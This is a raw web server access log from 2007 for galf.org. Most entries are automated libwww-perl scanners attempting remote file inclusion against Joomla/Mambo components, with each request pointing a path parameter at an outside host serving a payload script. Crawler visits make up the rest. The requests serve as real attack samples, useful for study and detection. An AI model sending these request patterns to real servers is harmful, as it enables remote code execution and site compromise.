89.106.79.20 - - [29/Jul/2007:23:18:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:23:18:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:23:19:04 -0700] "GET /logs/template.php?pagina=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:23:19:04 -0700] "GET /template.php?pagina=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.204.130 - - [29/Jul/2007:23:19:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [29/Jul/2007:23:19:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
193.151.6.55 - - [29/Jul/2007:23:20:35 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.151.6.55 - - [29/Jul/2007:23:20:36 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.161.181 - - [29/Jul/2007:23:21:06 -0700] "GET /logs/index.php?pagina=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
207.58.161.181 - - [29/Jul/2007:23:21:06 -0700] "GET /index.php?pagina=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:23:21:08 -0700] "GET /logs/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.241.208.65 - - [29/Jul/2007:23:21:09 -0700] "GET /index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:23:23:58 -0700] "GET /logs/template.php?pagina=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:23:23:58 -0700] "GET /template.php?pagina=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:23:25:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.64.202 - - [29/Jul/2007:23:25:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.165.27.94 - - [29/Jul/2007:23:25:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
82.165.27.94 - - [29/Jul/2007:23:25:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:23:26:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:23:26:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.67.245.245 - - [29/Jul/2007:23:26:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.245 - - [29/Jul/2007:23:26:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.123.79 - - [29/Jul/2007:23:27:36 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.123.79 - - [29/Jul/2007:23:27:36 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:23:31:41 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:23:31:42 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.24.152 - - [29/Jul/2007:23:31:51 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.93.6.26 - - [29/Jul/2007:23:32:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://exploits.my-place.us/id.txt,http://h1.ripway.com/h4ck/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.204.130 - - [29/Jul/2007:23:33:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [29/Jul/2007:23:33:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.249.73.202 - - [29/Jul/2007:23:34:39 -0700] "GET /logs/access_070730.log HTTP/1.1" 200 2917075 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:34:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:34:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.22.10 - - [29/Jul/2007:23:35:08 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.151.6.55 - - [29/Jul/2007:23:35:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.151.6.55 - - [29/Jul/2007:23:35:52 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:23:37:08 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:23:37:08 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
80.190.246.52 - - [29/Jul/2007:23:37:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.190.246.52 - - [29/Jul/2007:23:37:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.190.246.52 - - [29/Jul/2007:23:37:31 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.190.246.52 - - [29/Jul/2007:23:37:32 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.245 - - [29/Jul/2007:23:37:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.245 - - [29/Jul/2007:23:37:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:23:38:06 -0700] "GET /logs/index.php?x=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:23:38:07 -0700] "GET /index.php?x=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:38:12 -0700] "GET /logs//admin/includes/spaw/dialogs/insert_link.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:38:12 -0700] "GET //admin/includes/spaw/dialogs/insert_link.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.27.164.50 - - [29/Jul/2007:23:39:03 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.27.164.50 - - [29/Jul/2007:23:39:04 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.25.232 - - [29/Jul/2007:23:41:36 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.84.49.10 - - [29/Jul/2007:23:41:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.49.10 - - [29/Jul/2007:23:41:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.204.130 - - [29/Jul/2007:23:44:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [29/Jul/2007:23:44:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
80.88.171.29 - - [29/Jul/2007:23:45:14 -0700] "GET /logs/index2.php?x=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.88.171.29 - - [29/Jul/2007:23:45:15 -0700] "GET /index2.php?x=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.161.181 - - [29/Jul/2007:23:47:09 -0700] "GET /logs/index.php?pag=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
207.58.161.181 - - [29/Jul/2007:23:47:09 -0700] "GET /index.php?pag=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:23:49:50 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:23:49:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:51:24 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:51:24 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:52:03 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.242.23.235 - - [29/Jul/2007:23:52:03 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.54.188.106 - - [29/Jul/2007:23:52:03 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.54.188.106 - - [29/Jul/2007:23:52:05 -0700] "GET /logs/access_070312.log HTTP/1.0" 200 1048576 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:23:53:01 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:23:53:02 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:23:54:52 -0700] "GET /logs/index.php?go=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:23:54:53 -0700] "GET /index.php?go=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:23:55:59 -0700] "GET /logs/index.php?pag=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:23:55:59 -0700] "GET /index.php?pag=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.90.212.33 - - [29/Jul/2007:23:56:18 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cadisass.it/images/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.90.212.33 - - [29/Jul/2007:23:56:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cadisass.it/images/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.138.206.192 - - [29/Jul/2007:23:57:05 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/evilxxx/evil? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.170.43.179 - - [29/Jul/2007:23:57:22 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:23:57:23 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.230.204.130 - - [29/Jul/2007:23:57:35 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [29/Jul/2007:23:57:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.98.172.9 - - [29/Jul/2007:23:58:13 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.98.172.9 - - [29/Jul/2007:23:58:13 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.shababalordon.com/vb/ups.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.241.212.171 - - [30/Jul/2007:00:01:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.witheringinjustice.com/sikat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.230.1.146 - - [30/Jul/2007:00:08:10 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [30/Jul/2007:00:08:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.7.200.148 - - [30/Jul/2007:00:10:39 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.7.200.148 - - [30/Jul/2007:00:10:40 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.7.200.148 - - [30/Jul/2007:00:10:40 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.7.200.148 - - [30/Jul/2007:00:10:41 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.7.200.148 - - [30/Jul/2007:00:11:00 -0700] "GET /logs/access.log/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.7.200.148 - - [30/Jul/2007:00:11:01 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.7.200.148 - - [30/Jul/2007:00:11:01 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.54.188.105 - - [30/Jul/2007:00:11:10 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.54.188.105 - - [30/Jul/2007:00:11:12 -0700] "GET /logs/access_070319.log HTTP/1.0" 200 1048576 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.7.200.148 - - [30/Jul/2007:00:11:27 -0700] "GET /logs/access.log/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.7.200.148 - - [30/Jul/2007:00:11:28 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.7.200.148 - - [30/Jul/2007:00:11:29 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
87.230.1.146 - - [30/Jul/2007:00:11:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [30/Jul/2007:00:11:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.7.200.148 - - [30/Jul/2007:00:12:07 -0700] "GET /logs/access_070716.log/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.7.200.148 - - [30/Jul/2007:00:12:37 -0700] "GET /logs/access_070716.log/index.php?open=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.230.204.130 - - [30/Jul/2007:00:13:35 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [30/Jul/2007:00:13:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.194.6.75 - - [30/Jul/2007:00:14:37 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312467)" "galf.org"
89.106.79.20 - - [30/Jul/2007:00:16:03 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
89.106.79.20 - - [30/Jul/2007:00:16:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:16:10 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:16:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:20:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:20:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.171 - - [30/Jul/2007:00:21:06 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.witheringinjustice.com/sikat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.193.205.26 - - [30/Jul/2007:00:25:36 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
12.193.205.26 - - [30/Jul/2007:00:25:36 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.147.79.36 - - [30/Jul/2007:00:26:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Scooter/3.3" "www.galf.org"
69.147.79.36 - - [30/Jul/2007:00:26:08 -0700] "GET /revista.php HTTP/1.1" 404 275 "-" "Scooter/3.3" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:26:30 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:00:26:30 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.242.23.235 - - [30/Jul/2007:00:26:44 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.242.23.235 - - [30/Jul/2007:00:26:44 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
